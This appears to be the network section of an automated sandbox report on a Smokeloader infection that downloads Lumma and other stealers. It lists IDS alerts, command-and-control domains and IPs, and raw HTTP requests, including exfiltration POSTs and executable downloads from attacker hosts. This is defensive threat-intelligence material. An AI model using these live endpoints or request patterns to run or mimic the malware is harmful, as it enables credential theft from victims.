                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49736 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49737 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49738 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49739 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49740 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49741 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49743 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49744 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.4:52163 -> 1.1.1.1:53
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49746 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49748 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52655 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52656 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52658 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52693 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52694 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52695 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52696 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52697 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52698 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52736 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52737 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52738 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52739 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52740 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52741 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52742 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52743 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52744 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52745 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52746 -> 185.18.245.58:80
                Source: C:\Windows\explorer.exe Network Connect: 91.202.233.231 80
                Source: C:\Windows\explorer.exe Network Connect: 190.28.110.209 80
                Source: C:\Windows\explorer.exe Network Connect: 23.145.40.124 80
                Source: C:\Windows\explorer.exe Network Connect: 185.18.245.58 80
                Source: C:\Windows\explorer.exe Network Connect: 45.129.96.86 80
                Source: Malware configuration extractorURLs: boredimperissvieos.shop
                Source: Malware configuration extractorURLs: holicisticscrarws.shop
                Source: Malware configuration extractorURLs: sweetsquarediaslw.shop
                Source: Malware configuration extractorURLs: plaintediousidowsko.shop
                Source: Malware configuration extractorURLs: miniaturefinerninewjs.shop
                Source: Malware configuration extractorURLs: zippyfinickysofwps.shop
                Source: Malware configuration extractorURLs: obsceneclassyjuwks.shop
                Source: Malware configuration extractorURLs: acceptabledcooeprs.shop
                Source: Malware configuration extractorURLs: whispedwoodmoodsksl.shop
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199689717899
                Source: Malware configuration extractorURLs: http://dbfhns.in/tmp/index.php
                Source: Malware configuration extractorURLs: http://guteyr.cc/tmp/index.php
                Source: Malware configuration extractorURLs: http://greendag.ru/tmp/index.php
                Source: Malware configuration extractorURLs: http://lobulraualov.in.net/tmp/index.php
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Sun, 26 May 2024 08:22:31 GMTContent-Type: application/octet-streamContent-Length: 325120Last-Modified: Sun, 26 May 2024 08:20:02 GMTConnection: keep-aliveETag: "6652f0b2-4f600"Accept-Ranges: bytes
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 May 2024 08:23:01 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 26 May 2024 08:16:06 GMTETag: "205e00-619570326fd80"Accept-Ranges: bytesContent-Length: 2121216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-program
                Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 104.102.42.29 104.102.42.29
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 185.235.137.54 185.235.137.54
                Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: UNINETAZ UNINETAZ
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7083Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1230Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 582478Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBAKJEHDBGHIEBGCGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 5645Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGCFBGCBFHJECBGDAKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAEHCFHJJJJECAAFBKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 129229Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xdtlvnnwnlpkuygk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ytvhsyvyrbixtfi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://txpgggtypbkripei.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nwyllkfdfrdb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jpbahollcwbghe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oygcwhbcxoopv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: dbfhns.in
                Source: global trafficHTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fjtoifbsexibjqos.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eaiecpphhehnp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ohbpdxbbqxsqjiv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://thknwrjryktui.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: dbfhns.in
                Source: global trafficHTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
                Source: global trafficHTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mrnhbbwrygn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uhruuiuofju.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: dbfhns.in
                Source: global trafficHTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gdrusktiywhw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dswkxseehrq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://etlthdykpik.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://urrnadxnpwvv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hnoddeyuysdltft.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://djnjnheylgenw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mvirbkubtmy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukxbtouqvjwpgrb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lttuitxyemp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://haljhouhmvighpi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bkjyrxsoflynogyv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iymhuqeqmdev.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rscrbtwfrpl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://feebaxojoajqvghx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://flowliaawjqccjvx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dnklpspcfvmivsa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://juuhlbwtemhw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uipcoqrcfmpaso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: dbfhns.in
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFACC60 PR_Recv,9_2_6CFACC60
                Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn 